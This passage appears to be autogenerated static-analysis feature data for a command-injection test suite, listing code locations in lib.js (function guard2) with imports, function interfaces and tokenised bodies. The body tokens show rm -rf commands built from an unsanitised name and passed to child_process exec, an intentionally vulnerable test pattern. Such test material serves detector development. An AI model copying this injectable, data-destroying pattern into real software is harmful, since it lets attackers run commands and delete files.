autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:1:257:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:1:257:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:1:257:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:1:257:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:1:257:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:1:257:21 | module. ... .guard2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:1:257:21 | module. ... .guard2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:1:257:21 | module. ... .guard2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:1:265:1 | module. ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:1:265:1 | module. ... // OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:1:265:1 | module. ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:8:257:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:8:257:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:8:257:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:16:257:21 | guard2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:16:257:21 | guard2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:16:257:21 | guard2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:257:24 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:257:24 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:257:24 | cp | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:257:24 | cp | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:257:24 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:257:24 | fs | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:257:24 | fs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:257:24 | fs | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:257:24 | fs | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:257:24 | fs | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:257:24 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:257:24 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:257:24 | this | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:257:24 | this | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:257:24 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | 'arguments' object of anonymous function | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | exceptional return of anonymous function | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | functio ... // OK\\n} | assignedToPropName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | functio ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | functio ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | return of anonymous function | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:25:265:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:35:257:38 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:35:257:38 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:35:257:38 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:35:257:38 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:35:257:38 | name | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:35:257:38 | name | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:35:257:38 | name | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:35:257:38 | name | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:35:257:38 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:35:257:38 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:3 | cp | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:3 | cp | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| 